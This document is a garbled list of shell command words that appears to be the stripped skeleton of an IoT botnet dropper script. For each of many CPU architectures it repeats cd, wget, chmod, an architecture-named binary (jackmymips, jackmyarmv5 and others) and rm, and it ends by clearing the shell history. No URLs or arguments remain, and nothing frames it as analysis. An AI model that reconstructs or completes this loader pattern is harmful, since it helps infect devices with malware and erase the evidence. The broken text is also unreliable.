cd
cd
cd
cd
cd
wget
chmod
jackmymips
rm
cd
cd
cd
cd
cd
wget
chmod
jackmymipsel
rm
cd
cd
cd
cd
cd
wget
chmod
jackmysh4
rm
cd
cd
cd
cd
cd
wget
chmod
jackmyx86
rm
cd
cd
cd
cd
cd
wget
chmod
jackmyi586
rm
cd
cd
cd
cd
cd
wget
chmod
jackmypowerpc
rm
cd
cd
cd
cd
cd
wget
chmod
jackmypowerpc440fp
rm
cd
cd
cd
cd
cd
wget
chmod
jackmym86k
rm
cd
cd
cd
cd
cd
wget
chmod
jackmysparc
rm
cd
cd
cd
cd
cd
wget
chmod
jackmyarmv4
rm
cd
cd
cd
cd
cd
wget
chmod
jackmyarmv5
rm
cd
cd
cd
cd
cd
busybox
chmod
jacmymips
rm
history
rm
